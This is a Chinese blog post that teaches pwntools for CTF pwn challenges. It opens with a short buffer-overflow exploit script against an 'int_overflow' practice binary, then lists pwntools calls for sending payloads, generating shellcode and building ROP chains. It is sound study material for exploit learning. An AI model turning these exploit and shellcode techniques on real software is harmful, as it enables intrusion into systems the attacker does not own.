pwntools语句的简单使用,包含例子

最新推荐文章于 2024-05-15 08:30:00 发布
最新推荐文章于 2024-05-15 08:30:00 发布
阅读量2.7k 收藏 31
点赞数 4
分类专栏: PWN学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/111310841
版权 
from pwn import *
#io = process("./int_overflow")
io = remote("远程链接ip",端口)
flag_addr = 需要覆盖的flag地址如0x804868B
offset = 0x14 + 0x4
io.sendlineafter("Your choice:","1")
io.sendlineafter("username:","aaa")
payload = b"A"*offset + p32(flag_addr) + b"A"*(260 - offset - 4)
io.sendlineafter("passwd:",payload)
io.interactive()

pwntools语句讲解

连接

本地 :io = porcess("./文件名")
远程:io = remote(“ip地址”,端口)
关闭连接:io.close()

发送 payload

io.sendafter(some_string, payload) 接收到 some_string 后, 发送你的 payload;
p.sendlineafter(some_string, payload) 接收到 some_string 后, 发送你的 payload,加个换行
p.send(payload) 发送 payload
p.sendline(payload) 发送 payload,并进行换行(末尾\n)

接收返回内容

p.interactive() 直接进行交互,相当于回到shell的模式,一般在取得shell之后使用

生成 shellcode:

asm(shellcraft.sh())

p.recvn(N) 接受 N(数字) 字符

p.recvline() 接收一行输出

p.recvlines(N) 接收 N(数字) 行输出

p.recvuntil(some_string) 接收到 some_string 为止

stack=int(p.recv(10),16) 接收回显的参数在栈上的地址,长度是10,以16进制表示

ELF

首先需要 elf=ELF(’./filename’) 来产生一个对象
elf.symbols[‘a_function’] 找到 a_function 的地址
elf.got[‘a_function’] 找到 a_function的 got
elf.plt[‘a_function’] 找到 a_function 的 plt
elf.next(e.search(“some_characters”)) 找到包含 some_characters 可以是字符串,汇编代码或者某个数值的地址

ROP

rop = ROP(’./filename’) 还是要先创建一个对象
rop.raw(‘a’*32) 在构造的 rop 链里面写 32 个 a
rop.call(‘read’, (0, elf.bss(0x80))) 调用一个函数,可以简写成:rop.read(0, elf.bss(0x80))
rop.chain() 就是整个 rop 链,发送的 payload
rop.dump() 直观地展示当前的 rop 链
rop.migrate(base_stage) 将程序流程转移到 base_stage(地址)
rop.unresolve(value) 给出一个地址,反解析出符号
rop.search(regs=[‘ecx’,‘ebx’]) 搜索对 eax 进行操作的 gadgets
rop.find_gadget([‘pop eax’,‘ret’]) 搜索 pop eax ret 这样的 gadgets
在这里插入图片描述

半岛铁盒@
关注
  • 4
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ELF文件symbol分析
01-02
分析了ELF文件中symbol
pwntools使用初探——简单栈溢出的利用
小小鱼的博客
06-03 1459
注意的坑: buf长度要足够长,至少要大于shellcode的长度 pwntools生成shellcode的时候要在shellcract语句前面加上context
windows和linux下分别安装pwntools
最新发布
weixin_49765221的博客
05-15 517
首先可以先安装好python的环境,Python 2.7.9 + 或 Python 3.4+ 以上版本都自带 pip 工具。这个界面就是提示我们已经安装了一个版本的pwntools,我们可以进行更新到最新的版本。然后安装pwntools:pip install pwntools 完成。首先需要安装pip:apt install python3-pip。pwntoolspwn最常用的一个python包。更新完以后,查看版本的确是最新的版本。然后win+r进入命令行输入界面。
【逆向学习记录】Pwntool常用的数据处理方式
卦星的专栏
05-26 4266
1 概述 偶尔在pwn的题目中,使用pwntool工具,由于不熟练,经常性遗忘,尤其是接收地址的时候,会卡在数据处理上,因此单独起一篇文章,用来记录日常用到的各种问题。 参考文章: PwnTools常见用法 Pwntool 官方文档 2 数据处理方式 2.1 发送数据 send(payload) 发送payload sendline(payload) 发送payload,并进行换行(末尾\n) s...
PWN工具介绍
kelxLZ的博客
07-02 1056
Author:ZERO-A-ONE Date:2021-07-02 一、PWNTOOLS 1.1 程序的启动与远程连接 使用process接口启动程序 常用:process(argv,env),例如: process('./demo'):执行可执行文件demo process(['cat','flag]):执行命令cat flag process("./demo",env={'LD_PRELOAD':'./libc.so.6'}):以指定环境变量运行文件 当程序运行于远程时,提供了Host和监.
Pwn入门笔记(一)基础编程函数
qq_33590156的博客
11-23 1885
基础编程函数文件库和设置本地文件的调试和远程端口的连接发送和接收文件的加载类函数打/解包函数打包:解包shellcode 正式开始学习pwn了,第一次写pwn脚本,在开始之前需要了解一些基础知识。写pwn脚本我们用python在linux环境下运行。 文件库和设置 安装pwntools库后,开头加上 from pwn import * 这是导入pwntools库的所有函数,也是一个pwn脚本的起点。 context(os="liunx",arch="x86/amd64",log_level="debug"
pwntools常用脚本语句介绍讲解
半岛铁盒的博客
02-23 2917
接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。 recv(numb=字节大小, timeout=default) : 接收指定字节数。 recvall() : 一直接收直到达到文件EOF。 recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。 recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。 recvrepeat(timeou
SQL学习资料(包含所有常用的语句例子
08-20
sql学习必备,内含sql一些常用语句例子,有图有表,通过结果来理解sql语句的实现与结果。
力控5.0SQL语句使用样例
03-20
在这个例子中,它可能包含使用这些示例文件的步骤、注意事项,或者是对SQL语句在力控5.0中具体应用的详细解释。 通过深入研究这些文件,我们可以学习到以下知识点: 1. SQL基础:了解SQL的基本语法,包括SELECT...
从一个MySQL的例子来学习查询语句
09-11
从一个MySQL的例子来学习查询语句,这是最快最有效的学习方法之一。通过分析以下示例代码,我们可以了解到查询语句使用方法和查询的类型。 首先,让我们了解一下SELECT语句使用。SELECT语句用于从一个或多个表...
如何正确的使用语句
09-05
总结一下,正确使用语句块的关键点包括: 1. 使用花括号 `{}` 来明确表示语句块的开始和结束。 2. 理解并利用变量作用域来避免命名冲突和潜在的错误。 3. 在适当的情况下,如`if`、`for`、`while`和`switch`等控制...
Delphi使用Delete语句例子
05-11
摘要:Delphi源码,数据库应用,...Delphi使用Delete语句例子,一个简单例子,比较初级,主要是练习Sql语句使用Delete语句删除数据,从Delphi书中整理出来的例子,希望Delphi初学者喜欢。 运行环境:Delphi+MSSQL
攻防世界pwn之新手练习区
bahuishi9641的博客
07-30 1425
0x00 get_shell 题目描述:运行就能拿到shell呢,真的 from pwn import * io = remote('111.198.29.45','36389') io.interactive() 0x01 CGfsb 题目描述:菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 1.基本信息: Arch: i386-32-little ...
pwn学习day1——ELF文件结构
qq_44657899的博客
06-26 727
ELF 文件的结构可以根据不同的操作系统和体系结构而有所差异。
快速入门堆溢出技巧(OFF BY ONE)
蚁景网安学院
05-10 573
OFF BY ONE所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节并且堆块的fd(前驱指针)以及bk...
ELF文件中的符号
chwit的博客
03-07 887
ELF文件中的符号、符号修饰、强引用弱引用问题
简单栈溢出和覆盖的思考
weixin_44222568的博客
09-15 495
1.main函数F5反编译: 两个函数,第二个是system()函数,执行括号中的shell命令,此处就是重复输hello world.(注:system()会调用fork()产生子进程, 由子进程来调用/bin/sh-c string 来执行参数string 字符串所代表的命令, 此命令执行完后随即返回原调用的进程. 比如,在代码程序内部想获取当前目录下的文件名,很简单,可以这样:system(“ls”);) 2.进入 vulnerable_function: 第一行,给buf缓冲区变量申请0x88字
Linux二进制ELF程序查找symbol过程分析
ronnie88597的博客
09-18 3173
文章目录0.相关section的简介.got.plt.got.plt.plt.got1.关于Partial RELRO下的外部函数延迟/惰性(lazily)调用的过程分析1.1例子1.2静态编译结果初步分析1.3GOTPLT_ADDR是什么地址?jmp到该地址将会完成那些功能?1.4对比Partial Full下的符号查找过程1.5总结一下2.参考[Runtime Dynamic Linking](http://users.eecs.northwestern.edu/~kch479/docs/notes/l
程序的本质之三ELF文件中与符号(symbol)相关的section的定义
tanglinux
10-23 4431
操作系统:CentOS Linux release 7.7.1908 内核版本:3.10.0-1062.1.1.el7.x86_64 运行平台:x86_64 参考文献:http://refspecs.linuxfoundation.org/ 本文根据/usr/include/elf.h文件和程序编译的详细过程文中所述的tanglinux.c源码来分析可执行文件中与符号(symbol)...
mysql if语句使用例子
07-27
当在MySQL中使用IF语句时,可以根据条件来执行不同的操作。以下是一个使用IF语句的示例: 假设我们有一个名为"users"的表,其中包含"id"和"age"两列。我们想根据用户的年龄来确定他们是否成年。如果年龄大于等于18岁,则将成年标记为"是",否则标记为"否"。 可以使用IF语句来实现这个逻辑: ``` SELECT id, age, IF(age >= 18, '是', '否') AS is_adult FROM users; ``` 这个查询将返回一个结果集,其中包含用户的id、age和is_adult列。is_adult列使用IF语句根据age的值来确定用户是否成年。 请注意,上述示例中的IF语句在SELECT查询中使用。IF函数接受三个参数:条件表达式、如果条件为真时返回的值、如果条件为假时返回的值。可以根据需要修改这些参数来满足特定的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值